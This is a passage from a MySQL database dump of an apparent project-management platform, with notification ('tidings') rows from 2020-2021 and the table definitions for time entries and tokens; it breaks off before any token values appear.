18:44:18','PraiseTread',NULL),(1644,50,47,240,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-18 18:44:19','2020-08-18 18:44:19','PraiseTread',NULL),(1646,50,47,240,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-18 18:44:20','2020-08-18 18:44:20','PraiseTread',NULL),(1648,50,47,240,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-18 18:44:22','2020-08-18 18:44:22','PraiseTread',NULL),(1650,50,47,240,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-18 18:44:30','2020-08-18 18:44:30','PraiseTread',NULL),(1652,50,47,240,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-19 09:24:44','2020-08-19 09:24:44','PraiseTread',NULL),(1654,50,47,240,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-19 09:24:47','2020-08-19 09:24:47','PraiseTread',NULL),(1655,1,47,159,'PraiseTread',183,'Memo',NULL,NULL,NULL,0,'2020-08-19 09:26:08','2020-08-19 09:26:08','Praise',NULL),(1656,1,47,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-19 09:26:08','2020-08-19 09:26:08','PraiseTread',NULL),(1657,50,47,160,'PraiseTread',236,'Memo',NULL,NULL,NULL,0,'2020-08-19 09:43:43','2020-08-19 09:43:43','Praise',NULL),(1658,50,47,236,'Memo',236,'Memo',NULL,NULL,NULL,0,'2020-08-19 09:43:43','2020-08-19 09:43:43','PraiseTread',NULL),(1660,1,47,343,'Memo',NULL,'',NULL,NULL,NULL,0,'2020-08-19 10:01:13','2020-08-19 10:01:13','Memo',NULL),(1661,1,1,344,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-19 11:07:38','2020-08-19 11:07:38','Memo',NULL),(1722,1,1,345,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-21 08:41:57','2020-08-21 08:41:57','Memo',NULL),(1724,47,1,343,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-21 09:28:26','2020-08-21 09:28:26','Comment','1'),(1725,47,1,343,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-21 09:28:26','2020-08-21 09:28:26','Comment','1'),(1726,47,1,343,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-21 09:28:26','2020-08-21 09:28:26','Comment','1'),(1727,47,1,343,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-21 09:28:26','2020-08-21 09:28:26','Comment','1'),(1728,50,1,345,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-21 09:28:36','2020-08-21 09:28:36','Comment','3'),(1729,50,1,344,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-21 09:28:37','2020-08-21 09:28:37','Comment','3'),(1730,1,1,346,'Memo',232,'Memo',NULL,NULL,NULL,0,'2020-08-21 10:10:02','2020-08-21 10:10:02','Memo',NULL),(1731,50,1,346,'Memo',232,'Memo',NULL,NULL,NULL,0,'2020-08-21 10:10:17','2020-08-21 10:10:17','Comment','3'),(1734,1,111,4,'Memo',4,'Memo',NULL,NULL,NULL,0,'2020-08-21 15:49:20','2020-08-21 15:49:20','PraiseTread',NULL),(1736,1,111,4,'Memo',4,'Memo',NULL,NULL,NULL,0,'2020-08-21 15:49:24','2020-08-21 15:49:24','PraiseTread',NULL),(1738,1,111,4,'Memo',4,'Memo',NULL,NULL,NULL,0,'2020-08-21 15:49:25','2020-08-21 15:49:25','PraiseTread',NULL),(1740,1,111,4,'Memo',4,'Memo',NULL,NULL,NULL,0,'2020-08-21 15:49:28','2020-08-21 15:49:28','PraiseTread',NULL),(1741,1,46,348,'Memo',2,'Memo',NULL,NULL,NULL,0,'2020-08-24 15:06:30','2020-08-24 15:06:30','Memo',NULL),(1742,1,46,348,'Memo',2,'Memo',NULL,NULL,NULL,0,'2020-08-24 15:18:47','2020-08-24 15:18:47','Comment','3'),(1743,1,66,349,'Memo',348,'Memo',NULL,NULL,NULL,0,'2020-08-24 15:19:29','2020-08-24 15:19:29','Memo',NULL),(1750,1,111,2,'Memo',2,'Memo',NULL,NULL,NULL,0,'2020-08-24 17:47:50','2020-08-24 17:47:50','PraiseTread',NULL),(1751,46,47,218,'Issue',376,'Project',NULL,NULL,0,NULL,'2020-08-25 02:45:16','2020-08-25 02:45:16','issue',NULL),(1754,46,47,86,'Watcher',NULL,NULL,46,'User',NULL,0,'2020-08-25 11:40:14','2020-08-25 11:40:14','Fan',NULL),(1756,1,111,4,'Memo',4,'Memo',NULL,NULL,NULL,0,'2020-08-25 11:50:42','2020-08-25 11:50:42','PraiseTread',NULL),(1758,1,47,4,'Memo',4,'Memo',NULL,NULL,NULL,0,'2020-08-25 13:55:27','2020-08-25 13:55:27','PraiseTread',NULL),(1760,1,47,4,'Memo',4,'Memo',NULL,NULL,NULL,0,'2020-08-25 13:55:32','2020-08-25 13:55:32','PraiseTread',NULL),(1762,50,47,202,'PraiseTread',240,'Memo',NULL,NULL,NULL,0,'2020-08-25 14:04:54','2020-08-25 14:04:54','Praise',NULL),(1763,50,47,240,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-25 14:04:54','2020-08-25 14:04:54','PraiseTread',NULL),(1765,1,46,353,'Memo',345,'Memo',NULL,NULL,NULL,0,'2020-08-25 16:00:10','2020-08-25 16:00:10','Memo',NULL),(1767,47,47,343,'Memo',343,'Memo',NULL,NULL,NULL,0,'2020-08-25 16:04:09','2020-08-25 16:04:09','PraiseTread',NULL),(1768,50,46,204,'PraiseTread',241,'Memo',NULL,NULL,NULL,0,'2020-08-25 16:23:38','2020-08-25 16:23:38','Praise',NULL),(1769,50,46,241,'Memo',241,'Memo',NULL,NULL,NULL,0,'2020-08-25 16:23:38','2020-08-25 16:23:38','PraiseTread',NULL),(1771,47,47,343,'Memo',343,'Memo',NULL,NULL,NULL,0,'2020-08-25 17:20:51','2020-08-25 17:20:51','PraiseTread',NULL),(1773,47,47,343,'Memo',343,'Memo',NULL,NULL,NULL,0,'2020-08-25 17:35:32','2020-08-25 17:35:32','PraiseTread',NULL),(1775,47,47,343,'Memo',343,'Memo',NULL,NULL,NULL,0,'2020-08-25 18:22:40','2020-08-25 18:22:40','PraiseTread',NULL),(1776,47,47,208,'PraiseTread',343,'Memo',NULL,NULL,NULL,0,'2020-08-25 18:22:47','2020-08-25 18:22:47','Praise',NULL),(1777,47,47,343,'Memo',343,'Memo',NULL,NULL,NULL,0,'2020-08-25 18:22:47','2020-08-25 18:22:47','PraiseTread',NULL),(1780,50,47,210,'PraiseTread',241,'Memo',NULL,NULL,NULL,0,'2020-08-25 18:27:58','2020-08-25 18:27:58','Praise',NULL),(1781,50,47,241,'Memo',241,'Memo',NULL,NULL,NULL,0,'2020-08-25 18:27:58','2020-08-25 18:27:58','PraiseTread',NULL),(1794,1,47,217,'PraiseTread',4,'Memo',NULL,NULL,NULL,0,'2020-08-27 14:01:53','2020-08-27 14:01:53','Praise',NULL),(1795,1,47,4,'Memo',4,'Memo',NULL,NULL,NULL,0,'2020-08-27 14:01:53','2020-08-27 14:01:53','PraiseTread',NULL),(1798,1,111,4,'Memo',4,'Memo',NULL,NULL,NULL,0,'2020-08-27 17:54:24','2020-08-27 17:54:24','PraiseTread',NULL),(1800,115,111,337,'Memo',337,'Memo',NULL,NULL,NULL,0,'2020-08-27 17:59:28','2020-08-27 17:59:28','PraiseTread',NULL),(1806,50,115,224,'PraiseTread',240,'Memo',NULL,NULL,NULL,0,'2020-09-03 08:28:09','2020-09-03 08:28:09','Praise',NULL),(1807,50,115,240,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-09-03 08:28:09','2020-09-03 08:28:09','PraiseTread',NULL),(1809,1,1,4,'Memo',4,'Memo',NULL,NULL,NULL,0,'2020-09-03 09:16:20','2020-09-03 09:16:20','PraiseTread',NULL),(1810,1,111,226,'PraiseTread',4,'Memo',NULL,NULL,NULL,0,'2020-09-03 14:20:29','2020-09-03 14:20:29','Praise',NULL),(1811,1,111,4,'Memo',4,'Memo',NULL,NULL,NULL,0,'2020-09-03 14:20:29','2020-09-03 14:20:29','PraiseTread',NULL),(1813,47,111,343,'Memo',343,'Memo',NULL,NULL,NULL,0,'2020-09-07 09:34:27','2020-09-07 09:34:27','PraiseTread',NULL),(1816,1,63,356,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-09-08 08:10:24','2020-09-08 08:10:24','Memo',NULL),(1817,1,46,357,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-09-10 15:08:36','2020-09-10 15:08:36','Memo',NULL),(1820,1,63,229,'PraiseTread',21,'Memo',NULL,NULL,NULL,0,'2020-09-15 08:29:44','2020-09-15 08:29:44','Praise',NULL),(1821,1,63,21,'Memo',21,'Memo',NULL,NULL,NULL,0,'2020-09-15 08:29:44','2020-09-15 08:29:44','PraiseTread',NULL),(1826,46,46,232,'PraiseTread',357,'Memo',NULL,NULL,NULL,0,'2020-09-15 09:05:19','2020-09-15 09:05:19','Praise',NULL),(1827,46,46,357,'Memo',357,'Memo',NULL,NULL,NULL,0,'2020-09-15 09:05:19','2020-09-15 09:05:19','PraiseTread',NULL),(1828,63,46,233,'PraiseTread',356,'Memo',NULL,NULL,NULL,0,'2020-09-15 09:05:45','2020-09-15 09:05:45','Praise',NULL),(1829,63,46,356,'Memo',356,'Memo',NULL,NULL,NULL,0,'2020-09-15 09:05:45','2020-09-15 09:05:45','PraiseTread',NULL),(1830,1,46,234,'PraiseTread',345,'Memo',NULL,NULL,NULL,0,'2020-09-15 09:05:49','2020-09-15 09:05:49','Praise',NULL),(1831,1,46,345,'Memo',345,'Memo',NULL,NULL,NULL,0,'2020-09-15 09:05:49','2020-09-15 09:05:49','PraiseTread',NULL),(1832,1,46,235,'PraiseTread',344,'Memo',NULL,NULL,NULL,0,'2020-09-15 09:05:59','2020-09-15 09:05:59','Praise',NULL),(1833,1,46,344,'Memo',344,'Memo',NULL,NULL,NULL,0,'2020-09-15 09:05:59','2020-09-15 09:05:59','PraiseTread',NULL),(1835,111,1,89,'Watcher',NULL,NULL,111,'User',NULL,0,'2020-09-16 10:41:21','2020-09-16 10:41:21','Fan',NULL),(1836,1,55,359,'Memo',2,'Memo',NULL,NULL,NULL,0,'2020-09-18 09:29:49','2020-09-18 09:29:49','Memo',NULL),(1838,1,111,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-09-30 09:39:41','2020-09-30 09:39:41','PraiseTread',NULL),(1840,50,111,230,'Memo',230,'Memo',NULL,NULL,NULL,0,'2020-10-12 09:43:36','2020-10-12 09:43:36','PraiseTread',NULL),(1842,50,111,230,'Memo',230,'Memo',NULL,NULL,NULL,0,'2020-10-12 09:43:44','2020-10-12 09:43:44','PraiseTread',NULL),(1844,50,111,230,'Memo',230,'Memo',NULL,NULL,NULL,0,'2020-10-12 09:43:47','2020-10-12 09:43:47','PraiseTread',NULL),(1846,50,111,236,'Memo',236,'Memo',NULL,NULL,NULL,0,'2020-10-12 10:17:37','2020-10-12 10:17:37','PraiseTread',NULL),(1852,46,1,90,'Watcher',NULL,NULL,46,'User',NULL,0,'2020-10-14 17:08:01','2020-10-14 17:08:01','Fan',NULL),(1853,49,1,115,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-10-15 10:05:37','2020-10-15 10:05:37','Task','5'),(1854,49,1,116,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-10-15 10:16:17','2020-10-15 10:16:17','Task','5'),(1855,1,46,171,'Paper',NULL,NULL,115,'Task',1,0,'2020-10-15 11:00:22','2020-10-15 11:00:22','Comment','1'),(1856,1,63,172,'Paper',NULL,NULL,115,'Task',1,0,'2020-10-15 11:03:54','2020-10-15 11:03:54','Comment','1'),(1857,46,46,53,'PullRequest',370,'Project',NULL,NULL,0,NULL,'2020-10-15 06:55:11','2020-10-15 06:55:11','pull_request',NULL),(1858,1,46,116,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-10-15 17:22:02','2020-10-15 17:22:02','Project','2'),(1860,50,111,230,'Memo',230,'Memo',NULL,NULL,NULL,0,'2020-10-15 19:08:13','2020-10-15 19:08:13','PraiseTread',NULL),(1862,50,111,235,'Memo',235,'Memo',NULL,NULL,NULL,0,'2020-10-15 19:13:40','2020-10-15 19:13:40','PraiseTread',NULL),(1864,50,111,235,'Memo',235,'Memo',NULL,NULL,NULL,0,'2020-10-15 19:14:06','2020-10-15 19:14:06','PraiseTread',NULL),(1868,1,111,21,'Memo',21,'Memo',NULL,NULL,NULL,0,'2020-10-15 19:17:55','2020-10-15 19:17:55','PraiseTread',NULL),(1870,1,111,21,'Memo',21,'Memo',NULL,NULL,NULL,0,'2020-10-15 19:18:12','2020-10-15 19:18:12','PraiseTread',NULL),(1871,49,1,117,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-10-16 08:02:44','2020-10-16 08:02:44','Task','5'),(1872,1,46,173,'Paper',NULL,NULL,117,'Task',1,0,'2020-10-16 08:03:58','2020-10-16 08:03:58','Comment','1'),(1873,1,63,174,'Paper',NULL,NULL,117,'Task',1,0,'2020-10-16 08:05:10','2020-10-16 08:05:10','Comment','1'),(1874,1,46,117,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-10-16 08:07:25','2020-10-16 08:07:25','Project','2'),(1875,1,49,115,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-10-16 08:24:25','2020-10-16 08:24:25','Project','2'),(1876,1,49,117,'Task',NULL,NULL,NULL,NULL,1,0,'2020-10-16 08:29:35','2020-10-16 08:29:35','Task','21'),(1877,63,1,117,'Task',NULL,NULL,NULL,NULL,1,0,'2020-10-16 08:29:47','2020-10-16 08:29:47','System','11'),(1878,1,49,149,'Review',NULL,NULL,NULL,NULL,1,0,'2020-10-16 08:29:47','2020-10-16 08:29:47','Review','16'),(1879,1,49,116,'Task',NULL,NULL,NULL,NULL,1,0,'2020-10-16 08:29:54','2020-10-16 08:29:54','Task','21'),(1880,49,1,149,'Review',NULL,NULL,NULL,NULL,1,0,'2020-10-16 08:30:41','2020-10-16 08:30:41','System','17'),(1881,1,49,150,'Review',NULL,NULL,NULL,NULL,1,0,'2020-10-16 08:32:38','2020-10-16 08:32:38','Review','18'),(1882,49,1,150,'Review',NULL,NULL,NULL,NULL,1,0,'2020-10-16 08:33:24','2020-10-16 08:33:24','System','19'),(1883,49,1,118,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-10-16 08:48:57','2020-10-16 08:48:57','Task','5'),(1884,1,46,118,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-10-16 08:54:43','2020-10-16 08:54:43','Project','2'),(1885,1,49,118,'Task',NULL,NULL,NULL,NULL,1,0,'2020-10-16 09:00:23','2020-10-16 09:00:23','Task','21'),(1886,63,1,118,'Task',NULL,NULL,NULL,NULL,1,0,'2020-10-16 09:00:36','2020-10-16 09:00:36','System','11'),(1887,1,49,152,'Review',NULL,NULL,NULL,NULL,1,0,'2020-10-16 09:00:36','2020-10-16 09:00:36','Review','16'),(1888,49,1,152,'Review',NULL,NULL,NULL,NULL,1,0,'2020-10-16 09:02:16','2020-10-16 09:02:16','System','17'),(1889,49,1,152,'Review',NULL,NULL,NULL,NULL,1,0,'2020-10-16 09:02:21','2020-10-16 09:02:21','System','17'),(1890,1,49,153,'Review',NULL,NULL,NULL,NULL,1,0,'2020-10-16 09:03:25','2020-10-16 09:03:25','Review','18'),(1891,49,1,153,'Review',NULL,NULL,NULL,NULL,1,0,'2020-10-16 09:05:47','2020-10-16 09:05:47','System','19'),(1892,46,46,54,'PullRequest',370,'Project',NULL,NULL,0,NULL,'2020-10-16 02:06:32','2020-10-16 02:06:32','pull_request',NULL),(1893,49,1,119,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-10-16 12:24:33','2020-10-16 12:24:33','Task','5'),(1894,1,46,119,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-10-16 14:59:54','2020-10-16 14:59:54','Project','2'),(1896,1,111,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-10-22 13:50:32','2020-10-22 13:50:32','PraiseTread',NULL),(1897,49,1,116,'Task',NULL,NULL,NULL,NULL,1,0,'2020-10-22 16:21:23','2020-10-22 16:21:23','System','11'),(1898,66,1,116,'Task',NULL,NULL,NULL,NULL,1,0,'2020-10-22 16:21:23','2020-10-22 16:21:23','System','11'),(1899,49,1,120,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-12-01 11:12:19','2020-12-01 11:12:19','Task','5'),(1900,1,46,179,'Paper',NULL,NULL,120,'Task',1,0,'2020-12-01 11:16:03','2020-12-01 11:16:03','Comment','1'),(1901,1,127,94,'Watcher',NULL,NULL,1,'User',NULL,0,'2020-12-22 19:50:08','2020-12-22 19:50:08','Fan',NULL),(1902,1,129,7,'ApplyUserAuthentication',NULL,NULL,1,'User',1,NULL,'2020-12-27 11:46:48','2020-12-27 11:46:48','Apply',NULL),(1903,129,0,7,'ApplyUserAuthentication',NULL,NULL,129,'User',1,NULL,'2020-12-31 14:44:47','2020-12-31 14:44:47','System',NULL),(1917,121,122,58,'PullRequest',437,'Project',NULL,NULL,0,NULL,'2021-01-11 03:00:54','2021-01-11 03:00:54','pull_request',NULL),(1919,155,155,75,'PullRequest',473,'Project',NULL,NULL,0,NULL,'2021-01-22 08:12:52','2021-01-22 08:12:52','pull_request',NULL),(1920,155,155,251,'Issue',473,'Project',NULL,NULL,0,NULL,'2021-01-22 08:18:53','2021-01-22 08:18:53','issue',NULL),(1921,156,122,77,'PullRequest',477,'Project',NULL,NULL,0,NULL,'2021-01-26 02:15:42','2021-01-26 02:15:42','pull_request',NULL),(1922,122,156,255,'Issue',477,'Project',NULL,NULL,0,NULL,'2021-01-26 09:24:05','2021-01-26 09:24:05','issue',NULL),(1923,50,1,241,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2021-01-27 15:43:32','2021-01-27 15:43:32','Comment','1'),(1924,50,1,241,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2021-01-27 15:43:32','2021-01-27 15:43:32','Comment','1'),(1925,50,1,240,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2021-01-27 15:43:33','2021-01-27 15:43:33','Comment','1'),(1926,50,1,240,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2021-01-27 15:43:33','2021-01-27 15:43:33','Comment','1'),(1927,47,1,343,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2021-01-27 15:44:32','2021-01-27 15:44:32','Comment','1'),(1928,47,1,343,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2021-01-27 15:44:32','2021-01-27 15:44:32','Comment','1'),(1929,115,1,337,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2021-01-27 15:44:33','2021-01-27 15:44:33','Comment','1'),(1930,115,1,337,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2021-01-27 15:44:33','2021-01-27 15:44:33','Comment','1'),(1931,50,1,239,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2021-01-27 15:44:34','2021-01-27 15:44:34','Comment','1'),(1932,50,1,239,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2021-01-27 15:44:34','2021-01-27 15:44:34','Comment','1'),(1933,50,1,236,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2021-01-27 15:44:34','2021-01-27 15:44:34','Comment','1'),(1934,50,1,236,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2021-01-27 15:44:34','2021-01-27 15:44:34','Comment','1'),(1935,1,55,359,'Memo',2,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:43','2021-01-27 15:52:43','Comment','3'),(1936,50,46,357,'Memo',240,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:44','2021-01-27 15:52:44','Comment','3'),(1937,50,46,357,'Memo',240,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:44','2021-01-27 15:52:44','Comment','3'),(1938,50,46,357,'Memo',240,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:44','2021-01-27 15:52:44','Comment','3'),(1939,50,63,356,'Memo',240,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:45','2021-01-27 15:52:45','Comment','3'),(1940,50,63,356,'Memo',240,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:45','2021-01-27 15:52:45','Comment','3'),(1941,50,63,356,'Memo',240,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:45','2021-01-27 15:52:45','Comment','3'),(1942,1,46,353,'Memo',240,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:48','2021-01-27 15:52:48','Comment','3'),(1943,1,46,353,'Memo',240,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:48','2021-01-27 15:52:48','Comment','3'),(1944,1,46,353,'Memo',240,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:48','2021-01-27 15:52:48','Comment','3'),(1945,1,46,353,'Memo',240,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:48','2021-01-27 15:52:48','Comment','3'),(1946,46,66,349,'Memo',2,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:49','2021-01-27 15:52:49','Comment','3'),(1947,46,66,349,'Memo',2,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:49','2021-01-27 15:52:49','Comment','3'),(1948,46,66,349,'Memo',2,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:49','2021-01-27 15:52:49','Comment','3'),(1949,46,66,349,'Memo',2,'Memo',NULL,NULL,NULL,0,'2021-01-27 15:52:49','2021-01-27 15:52:49','Comment','3'),(1950,1,46,367,'Memo',NULL,'',NULL,NULL,NULL,0,'2021-01-27 17:35:49','2021-01-27 17:35:49','Memo',NULL),(1951,156,122,78,'PullRequest',477,'Project',NULL,NULL,0,NULL,'2021-01-28 07:09:03','2021-01-28 07:09:03','pull_request',NULL),(1952,1,115,368,'Memo',NULL,'',NULL,NULL,NULL,0,'2021-01-28 18:40:05','2021-01-28 18:40:05','Memo',NULL),(1953,1,115,369,'Memo',NULL,'',NULL,NULL,NULL,0,'2021-01-29 07:50:22','2021-01-29 07:50:22','Memo',NULL),(1954,1,172,8,'ApplyUserAuthentication',NULL,NULL,1,'User',1,NULL,'2021-02-20 11:09:40','2021-02-20 11:09:40','Apply',NULL),(1955,49,49,264,'Issue',494,'Project',NULL,NULL,0,NULL,'2021-02-22 08:33:51','2021-02-22 08:33:51','issue',NULL),(1956,49,1,121,'Task',NULL,NULL,NULL,NULL,0,NULL,'2021-02-23 14:44:31','2021-02-23 14:44:31','Task','5'),(1957,1,1,121,'Task',NULL,NULL,NULL,NULL,0,NULL,'2021-02-23 16:34:11','2021-02-23 16:34:11','Project','2'),(1958,49,1,122,'Task',NULL,NULL,NULL,NULL,0,NULL,'2021-02-23 16:35:44','2021-02-23 16:35:44','Task','5'),(1959,49,1,96,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:38:35','2021-02-23 16:38:35','System','8'),(1960,49,1,121,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:39:23','2021-02-23 16:39:23','System','8'),(1961,49,1,12,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:39:59','2021-02-23 16:39:59','System','9'),(1962,50,1,13,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:40:02','2021-02-23 16:40:02','System','9'),(1963,49,1,69,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:40:04','2021-02-23 16:40:04','System','9'),(1964,49,1,89,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:40:06','2021-02-23 16:40:06','System','9'),(1965,49,1,91,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:40:09','2021-02-23 16:40:09','System','9'),(1966,49,1,92,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:40:11','2021-02-23 16:40:11','System','9'),(1967,49,1,101,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:40:16','2021-02-23 16:40:16','System','9'),(1968,49,1,93,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:40:18','2021-02-23 16:40:18','System','9'),(1969,49,1,94,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:40:20','2021-02-23 16:40:20','System','9'),(1970,49,1,95,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:40:23','2021-02-23 16:40:23','System','9'),(1971,49,1,104,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:40:31','2021-02-23 16:40:31','System','9'),(1972,49,1,105,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:40:34','2021-02-23 16:40:34','System','9'),(1973,1,49,122,'Task',NULL,NULL,NULL,NULL,0,NULL,'2021-02-23 16:53:15','2021-02-23 16:53:15','Project','2'),(1974,49,1,122,'Task',NULL,NULL,NULL,NULL,1,0,'2021-02-23 16:53:38','2021-02-23 16:53:38','System','8'),(1975,1,182,9,'ApplyUserAuthentication',NULL,NULL,1,'User',1,NULL,'2021-02-25 08:49:35','2021-02-25 08:49:35','Apply',NULL),(1976,182,0,9,'ApplyUserAuthentication',NULL,NULL,182,'User',1,NULL,'2021-02-25 08:51:24','2021-02-25 08:51:24','System',NULL),(1977,172,0,8,'ApplyUserAuthentication',NULL,NULL,172,'User',1,NULL,'2021-02-25 08:51:26','2021-02-25 08:51:26','System',NULL),(1987,134,128,NULL,'PullRequest',430,'Project',NULL,NULL,0,NULL,'2021-02-25 09:43:17','2021-02-25 09:43:17','pull_request',NULL),(1988,134,128,NULL,'PullRequest',430,'Project',NULL,NULL,0,NULL,'2021-02-25 09:43:54','2021-02-25 09:43:54','pull_request',NULL),(1989,134,128,84,'PullRequest',430,'Project',NULL,NULL,0,NULL,'2021-02-25 10:39:42','2021-02-25 10:39:42','pull_request',NULL),(1992,1,203,10,'ApplyUserAuthentication',NULL,NULL,1,'User',1,NULL,'2021-03-05 13:13:54','2021-03-05 13:13:54','Apply',NULL),(1993,203,0,10,'ApplyUserAuthentication',NULL,NULL,203,'User',1,NULL,'2021-03-09 10:15:37','2021-03-09 10:15:37','System',NULL),(1994,1,1,370,'Memo',NULL,'',NULL,NULL,NULL,0,'2021-03-10 17:03:47','2021-03-10 17:03:47','Memo',NULL);
|
||
/*!40000 ALTER TABLE `tidings` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `time_entries`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `time_entries`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `time_entries` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) NOT NULL,
|
||
`user_id` int(11) NOT NULL,
|
||
`issue_id` int(11) DEFAULT NULL,
|
||
`hours` float NOT NULL,
|
||
`comments` varchar(255) DEFAULT NULL,
|
||
`activity_id` int(11) NOT NULL,
|
||
`spent_on` date NOT NULL,
|
||
`tyear` int(11) NOT NULL,
|
||
`tmonth` int(11) NOT NULL,
|
||
`tweek` int(11) NOT NULL,
|
||
`created_on` datetime NOT NULL,
|
||
`updated_on` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `time_entries_project_id` (`project_id`),
|
||
KEY `time_entries_issue_id` (`issue_id`),
|
||
KEY `index_time_entries_on_activity_id` (`activity_id`),
|
||
KEY `index_time_entries_on_user_id` (`user_id`),
|
||
KEY `index_time_entries_on_created_on` (`created_on`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `time_entries`
|
||
--
|
||
|
||
LOCK TABLES `time_entries` WRITE;
|
||
/*!40000 ALTER TABLE `time_entries` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `time_entries` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `tokens`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `tokens`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `tokens` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) NOT NULL DEFAULT '0',
|
||
`action` varchar(30) NOT NULL DEFAULT '',
|
||
`value` varchar(40) NOT NULL DEFAULT '',
|
||
`created_on` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
UNIQUE KEY `tokens_value` (`value`),
|
||
KEY `index_tokens_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=339 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `tokens`
|
||
--
|
||
|
||
LOCK TABLES `tokens` WRITE;
|
||
/*!40000 ALTER TABLE `tokens` DISABLE KEYS */;
|
||
